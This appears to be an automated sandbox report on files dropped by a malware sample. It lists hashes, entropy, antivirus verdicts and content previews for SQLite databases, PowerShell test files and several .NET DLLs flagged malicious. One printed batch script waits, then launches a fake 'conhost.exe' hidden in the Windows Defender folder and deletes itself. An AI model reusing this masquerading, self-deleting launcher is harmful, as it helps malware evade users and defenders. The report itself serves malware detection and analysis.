                                                                                              SHA-512:F29E5B1C74A2933525659CE6E8B56A714742D0A4A5C7E4C7DADFF75DF97578B5BCEF243183C08215CE560F1216ACCE6E146FD4B4CCF8ED7A5DF03A6227ED9CE1
                                                                                              Malicious:false
                                                                                              Preview:Nfu3BRjdJ3FAyZvtis5Ktm5SP
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                              Category:dropped
                                                                                              Size (bytes):28672
                                                                                              Entropy (8bit):2.5793180405395284
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):179
                                                                                              Entropy (8bit):5.152225396600093
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZjgL8JA7EfpJSBktKcKZG1t+kiE2J5xAIGyjLkRH:hCRLuVFOOr+DEiyA7EfyKOZG1wkn23fO
                                                                                              MD5:FDA0DA3D9413DD22B474268A51193FA5
                                                                                              SHA1:C771B0B7D02CEC50850B25BCB4835FE20EDDA807
                                                                                              SHA-256:2C8C23151B7D4ACB5A26B9341E25A844041437B6F70C6E08D5560A7179C0CD1D
                                                                                              SHA-512:2C2CD6B62211958CC22DDEC29132C28DA84F3E3C39D558029FF768538DE5618A0DB611D2585DD7481DFC21E51E3FF7BF9D2D690928E8AA3D0BA66EF637DE0C79
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Defender\en-GB\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\csCDqY6YZN.bat"
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08235737944063153
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.8180424350137764
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.932541123129161
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: eu6OEBpBCI.exe, Detection: malicious, Browse
                                                                                              • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: FToZAUe1tw.exe, Detection: malicious, Browse
                                                                                              • Filename: gorkmTnChA.exe, Detection: malicious, Browse
                                                                                              • Filename: fnNUIS1KeW.exe, Detection: malicious, Browse
                                                                                              • Filename: kqq1aAcVUQ.exe, Detection: malicious, Browse
                                                                                              • Filename: Qsi7IgkrWa.exe, Detection: malicious, Browse
                                                                                              • Filename: A5EbyKyjhV.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):23552
                                                                                              Entropy (8bit):5.519109060441589
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.932541123129161
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (507), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):507
                                                                                              Entropy (8bit):5.861894720784801
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:j9GwkCCYqx6sMyC6SnHYvzKqF0nllM5cB3NveXD4:RGwtCYrsMvDtLo5ENvez4
                                                                                              MD5:75CE2391FFED537F5A7042C1FE50EFC7
                                                                                              SHA1:8EC8E602FCB1A4DCCD66A720A2B496F686F8DC97
                                                                                              SHA-256:77DC3612621EA4277692C38B781B0B73AE6C032C30B287F844708028F5B03DA5
                                                                                              SHA-512:1268D99F3F78386A451700DFB77EF665F8940141D6AECCFBAF9C25057702341B818DA1FC7F4816A2FBFCC718D8FCADC79A63D10DEE8394FF4059BFB35F49EE81
                                                                                              Malicious:false
                                                                                              Preview:7bfKwETyxtu4dcAcSt2GxtujsnpobEIBaNFIx4sKIZflgmNv6FC5gXrNr6bIZoWtlsePX2oXBr7XOIDGZ3sVBMfCg1b1cjveDvAxI8YDbo4yZU9i2Vsf5AsYNbtfbw4b6dTcIQ8bfp4WSqmL138H0QiDDljqO2mouc26AgZmXR9QFVFgzhohyxlp5QZgqRNnCPm0yqLVdWujRR7rfC1qOE071NBuH25FEWO0sPsJWTDbCBYnSrAnZgZ7Zp9kobNlaof4DH9QTsU5AY4zzXbZ2Rph7QaCQIe5FcAXgdkLsuUrMd7AvKvR9ysI877wq69LOYzhYgSVxQrH78VdTaRGWM6Qu1ZjfxevuIcxoZmO1ZesHlLAmedQp3yBcjxgHtz9w5Wzfiz4yDO6sNJJqY6BUOG1TbUElFHIke6LOVeEojbmo2SPaozswxohzffENuSs5GWNQ74U42XvweNbIFo6PYVw0YVt0a04QsqhfE8ctfy3a2vVRE5IGVdhujX
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):85504
                                                                                              Entropy (8bit):5.8769270258874755
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):23552
                                                                                              Entropy (8bit):5.519109060441589
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):85504
                                                                                              Entropy (8bit):5.8769270258874755
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):32256
                                                                                              Entropy (8bit):5.631194486392901
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):32256
                                                                                              Entropy (8bit):5.631194486392901
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 25%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):55
                                                                                              Entropy (8bit):4.306461250274409
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                              Malicious:false
                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:MSVC .res
                                                                                              Category:dropped
                                                                                              Size (bytes):1224
                                                                                              Entropy (8bit):4.435108676655666
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                              MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                              Malicious:false
